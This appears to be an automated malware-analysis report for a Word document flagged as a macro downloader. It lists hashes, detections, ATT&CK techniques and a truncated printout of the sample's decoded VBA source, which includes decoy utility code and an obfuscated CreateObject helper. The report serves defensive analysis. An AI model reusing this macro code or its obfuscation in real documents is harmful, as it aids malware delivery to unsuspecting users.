Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce70591644f59702…

MALICIOUS

Office (OLE)

Size: 641.5 KB
Created: 2020-01-20 10:54:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: e4adc17db92f475e78fa420275f0dafc
SHA-1: 680a376f0f135a616999d4254e142c3f77098ff6
SHA-256: ce70591644f59702a8bd2400b16faadc8225ce8dcce801b9cfb5b37ea25bc4d1
Risk Score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. Heuristics flag calls to CreateObject and CallByName, which are commonly used to execute malicious code. The ClamAV detection 'Doc.Downloader.Powdow-7643936-0' strongly suggests downloader functionality: the VBA macros likely download and execute a second-stage payload.

Heuristics (5)

  • [critical] ClamAV: Doc.Downloader.Powdow-7643936-0 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Powdow-7643936-0
  • [medium] VBA macros detected, 2 related findings (OLE_VBA_MACROS)
    Document contains VBA macro code
  • [high] CreateObject call (OLE_VBA_CREATEOBJ)
    CreateObject call
  • [high] CallByName call (OLE_VBA_CALLBYNAME)
    CallByName call
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8910 bytes
SHA-256: 6c7e92db8fc0c321e066ac92b08a734775a83885a425fc9ad97837810ceb72bb
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Medasco As String
Private Vedfol As String
Private Lerdf As String
Private Masxcol As String
Public Nerdfoc As String


Private Sub InitializeDictionary()
    ' Create dictionary object (erases current dictionary)
    Set objTemplates = CreateObject("Scripting.Dictionary")
    objTemplates.CompareMode = vbTextCompare ' Not case-sensitive
End Sub



Private Sub testDictionary()
    
    Call InitializeDictionary
    
    objTemplates.Add "diabetes", "a1c is above goal"
    objTemplates.Add "cholesterol", "ldl is above goal"
    objTemplates.Add "hypertension", "bp is above goal"
    
    ' Print all templates in immediate window
    Dim shortcut As Variant
    For Each shortcut In objTemplates.keys
        'Debug.Print shortcut, objTemplates(shortcut)
    Next shortcut
    
End Sub



Public Function DictionaryExists() As Boolean
    If objTemplates Is Nothing Then
        DictionaryExists = False
    Else
        DictionaryExists = True
    End If
End Function



Sub selectNewWorksheets()
'
' selectNewWorksheets Macro
'
'
    ActiveDocument.Tables.Add Range:=Selection.Range, NumRows:=4, NumColumns:= _
        4, DefaultTableBehavior:=wdWord9TableBehavior, AutoFitBehavior:= _
        wdAutoFitWindow
    With Selection.Tables(1)
        If .Style <> "Table Grid" Then
            .Style = "Table Grid"
        End If
        .ApplyStyleHeadingRows = True
        .ApplyStyleLastRow = False
        .ApplyStyleFirstColumn = True
        .ApplyStyleLastColumn = False
        .ApplyStyleRowBands = True
        .ApplyStyleColumnBands = False
    End With
End Sub



Sub TakeCSVandAnalyse(fileName_StringPath)

'
' TakeCSVandAnalyse Macro
'
'
        
    Dim someString, stringToAdd As String
    Dim fileNo As Integer
    Dim TildeOrCommaSeparated, toDivide As String
    fileNo = 1
    
    strFile = fileName_StringPath '"C:\Users\matteo_montanari\Desktop\QuestionflashCardsxlsx.csv"
    
    TildeOrCommaSeparated = Right(fileName_StringPath, 3)
    

    
    With CreateObject("Scripting.FileSystemObject")
        someString = .OpenTextFile(strFile, 1).ReadAll
        GetLineCount = UBound(Split(.OpenTextFile(strFile, 1).ReadAll, vbNewLine))
    End With
     
    
    linesToAdd = 16 - (GetLineCount Mod 16)
  
    stringToAdd = " "
     
    If linesToAdd = 16 Then
    
    Else
    
        If TildeOrCommaSeparated = "csv" Then
             
             toDivide = Chr(44)
        Else
             toDivide = Chr(126)
        End If
        
       For Line = 1 To linesToAdd
            If Line = linesToAdd Then
            
                stringToAdd = stringToAdd + Chr(32) + toDivide + Chr(32) + " "
            
            Else
                stringToAdd = stringToAdd + Chr(32) + toDivide + Chr(32) + vbNewLine
            End If
            

       Next Line
        
        Open strFile For Output As #fileNo  'Open file for overwriting! Replace Output with Append to append
        Print #fileNo, Replace(someString + stringToAdd, Chr(147), Chr(10))
        Close #fileNo
    End If
    
   
 
End Sub


Private Function ulicdr(i As String, op As String) As Object
On Error GoTo ErrHandler
Set ulicdr = CreateObject(op)
Exit Function
ErrHandler:
Set ulicdr = CreateObject(i)
End Function



Sub ImportCSV(fileName_StringPath)
    Dim strFile As String
    Dim strLine As String
    Dim TildeOrCommaSeparated As String
    Dim arrWords() As String
    Dim arrParts() As String
    
    Dim LinearWords As Collection
    Set LinearWords = New Collection
    
    Dim lngNum As Long
    Dim lngCount As Long
    
    Dim Word_Found As Variant
    
    Dim ArrayReverser(1 To 4) As Integer
    ArrayReverser
... (truncated)